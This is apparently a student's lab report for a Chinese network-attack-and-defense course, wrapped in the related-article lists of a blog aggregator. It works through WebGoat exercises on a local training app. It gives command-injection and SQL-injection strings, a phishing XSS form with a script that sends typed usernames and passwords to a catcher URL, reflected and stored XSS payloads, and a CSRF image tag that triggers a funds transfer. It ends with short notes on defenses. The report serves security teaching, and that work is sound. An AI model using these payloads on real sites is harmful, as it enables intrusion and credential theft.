2018-2019-2 20165219《网络对抗技术》Exp9 Web安全基础
2018-2019-2 20165219《网络对抗技术》Exp9 Web安全基础
一 实验内容
WebGoat配置
进入https://github.com/WebGoat/WebGoat/releases?after=8.0.0网站html
下载 webgoat-container-7.0.1-war-exec.jarjava
输入java -jar webgoat-container-7.0.1-war-exec.jar安装jar包git
览器登录http://localhost:8080/WebGoat网站
github
SQL注入攻击
1.命令注入(Command Injection)
选择 Injection Flaws -> Command Injection
右键页面中复选框,选择inspect
Element审查网页元素对源代码进行修改,在末尾添加"& netstat -an & ipconfig"web
点击 view,看到网络端口使用状况和 IP 地址,攻击成功
sql
2.Numeric SQL Injection
Goal:The form below allows a user to view weather data. Try to inject an SQL string that results in all the weather data being displayed.浏览器
右键点击复选框,选择inspect Element审查网页元素对源代码value="101"进行修改,在城市编号101后面添加or 1=1
安全
3.String SQL Injection
Goal:The form below allows a user to view their credit card numbers. Try to inject an SQL string that results in all the credit card numbers being displayed.cookie
输入查询的用户名' or 1=1--
网络
4.String SQL Injection
Goal:Use String SQL Injection to bypass authentication.
在密码框右键选择inspect Element审查网页元素对长度进行修改
在密码框输入' or 1=1 --
XSS攻击
1 Phishing with XSS
编写一个带用户名和密码输入框的表格
<form> <br><br><HR><H3>This feature requires account login:</H3 ><br><br> Enter Username:<br><input type="text" id="user" name="user"><br> Enter Password:<br><input type="password" name = "pass"><br> </form><br><br><HR>
编写一段脚本读取被攻击者在表单上输入的用户名和密码信息,将这些信息发送给捕获这些信息的 WebGoat
function hack()
{
alert("Had this been a real attack... Your credentials were just stolen." User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value);
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user="+ document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";
}
</script>
将两段代码合并后,在 XSS - > Phishing with XSS搜索上面代码,在显示的表单中输入用户名和密码,登陆后WebGoat会将输入的信息捕获并反馈给咱们
2 Reflected XSS
在code框输入<script>alert("20165219");</script>
点击purchase,则会弹出窗口,内容是括号里的串
3 Stored XSS Attacks
在massage部分插入jsp代码,代码会被浏览器解析成html的内容
在message窗口输入<script>alert("wyb");</script>,说明攻击成功
CSRF攻击
1 Cross Site Request Forgery
在Message框中输入
<img src="http://localhost:8080/WebGoat/attack?Screen=303&menu=900&transferFunds=10000" width="1" height="1" />
问题回答
SQL注入攻击原理,如何防护
检查输入数据类型和格式
XSS攻击的原理,如何防护
在表单提交或者url参数传递前,对须要的参数进行过滤。检查用户输入的内容中是否有非法内容
CSRF攻击原理,如何防护
经过referer、token或者验证码来检测用户提交 避免全站通用的cookie,严格设置cookie的域
- 1. 2018-2019-2 网络对抗技术 20165231 Exp9 Web安全基础
- 2. 20155219付颖卓 《网络对抗技术》 Exp9 Web安全基础
- 3. 2017-2018-2 20155224 『网络对抗技术』Exp9:Web安全基础
- 4. 2018-2019-2 20165212《网络对抗技术》Exp9 Web安全基础
- 5. 2018-2019-2 20165227《网络对抗技术》Exp9 Web安全基础
- 6. 2017-2018-2 20155303『网络对抗技术』Exp9:Web安全基础
- 7. 2017-2018-2 《网络对抗技术》20155322 Exp9 web安全基础
- 8. 20164317《网络对抗技术》Exp9 Web安全基础
- 9. 2018-2019-2 网络对抗技术 20165324 Exp9: Web安全基础
- 10. 2018-2019-2 20165330《网络对抗技术》Exp9 Web安全基础
- 更多相关文章...
- • 网站主机 技术 - 网站主机教程
- • XML 相关技术 - XML 教程
- • 三篇文章了解 TiDB 技术内幕——说存储
- • 三篇文章了解 TiDB 技术内幕 —— 谈调度
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. 「插件」Runner更新Pro版,帮助设计师远离996
- 2. 错误 707 Could not load file or assembly ‘Newtonsoft.Json, Version=12.0.0.0, Culture=neutral, PublicKe
- 3. Jenkins 2018 报告速览,Kubernetes使用率跃升235%!
- 4. TVI-Android技术篇之注解Annotation
- 5. android studio启动项目
- 6. Android的ADIL
- 7. Android卡顿的检测及优化方法汇总(线下+线上)
- 8. 登录注册的业务逻辑流程梳理
- 9. NDK(1)创建自己的C/C++文件
- 10. 小菜的系统框架界面设计-你的评估是我的决策
- 1. 2018-2019-2 网络对抗技术 20165231 Exp9 Web安全基础
- 2. 20155219付颖卓 《网络对抗技术》 Exp9 Web安全基础
- 3. 2017-2018-2 20155224 『网络对抗技术』Exp9:Web安全基础
- 4. 2018-2019-2 20165212《网络对抗技术》Exp9 Web安全基础
- 5. 2018-2019-2 20165227《网络对抗技术》Exp9 Web安全基础
- 6. 2017-2018-2 20155303『网络对抗技术』Exp9:Web安全基础
- 7. 2017-2018-2 《网络对抗技术》20155322 Exp9 web安全基础
- 8. 20164317《网络对抗技术》Exp9 Web安全基础
- 9. 2018-2019-2 网络对抗技术 20165324 Exp9: Web安全基础
- 10. 2018-2019-2 20165330《网络对抗技术》Exp9 Web安全基础